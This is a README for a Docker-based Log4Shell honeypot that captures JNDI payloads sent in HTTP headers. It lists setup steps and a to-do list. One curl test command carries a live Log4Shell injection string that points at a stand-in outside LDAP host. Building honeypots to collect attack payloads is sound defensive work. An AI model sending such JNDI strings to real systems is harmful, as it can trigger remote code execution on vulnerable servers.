## https://sploitus.com/exploit?id=32BB43C3-F80D-5CBF-83AD-55BD38C2A440
# log4shell-honeypot
Catch and download `log4shell` payloads sent within HTTP headers. Modified version of [Adikso's minecraft honeypot](https://github.com/Adikso/minecraft-log4j-honeypot) ,[sysgoblin's log4shell-honeypot](https://github.com/sysgoblin/log4shell-honeypot) and [LoginRadius](https://github.com/LoginRadius/awesome-login-pages)
## Setup
1. `git clone $repo`
2. `docker-compose up`
3. Send payloads within a http header to `$dockerip:$port`
To add additional honeypots on different ports, copy and paste an existing service within `docker-compose.yml`, changing the service name, and alter the ports within `ports` and `command`.
```bash
curl --user-agent '${jndi:ldap://lmao.com:1389/a}' http://localhost:80
```
Payloads are saved within `payloads/`
Logs are printed to the screen by default, but can be retreived with `docker inspect`. e.g:
```bash
docker inspect --format='{{.LogPath}}' log4shell-honeypot_http_1 | xargs cat
```
## ToDo
1. Fix display of static files (probably a proxy issue).
2. Log format needs to be modified to ISO8601 and to match the format used in T-Pot (preferably JSON).
3. At the time of writing, the HoneyPot logs the requests sent, it would be nice if the username/password form could also log the sent payloads.
4. Make the front-end look a bit nicer.
5. Better testing environment. Maybe with a self hosted LDAP server to validate all functions.